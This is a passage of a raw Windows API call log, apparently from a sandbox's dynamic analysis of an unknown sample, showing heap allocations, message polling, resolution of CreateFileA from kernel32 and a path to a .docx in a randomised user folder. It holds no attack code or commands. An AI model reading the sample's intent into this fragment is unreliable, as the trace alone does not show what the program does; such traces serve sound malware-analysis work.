dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.633] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.633] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.633] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.633] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0168.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0168.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.634] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.637] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.640] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd3a8 [0168.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd3a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0168.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.641] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0168.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0168.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0168.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.642] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0168.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6b008 [0168.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0168.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x35) returned 0x90ad98 [0168.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", cchWideChar=53, lpMultiByteStr=0x90ad98, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpUsedDefaultChar=0x0) returned 53 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 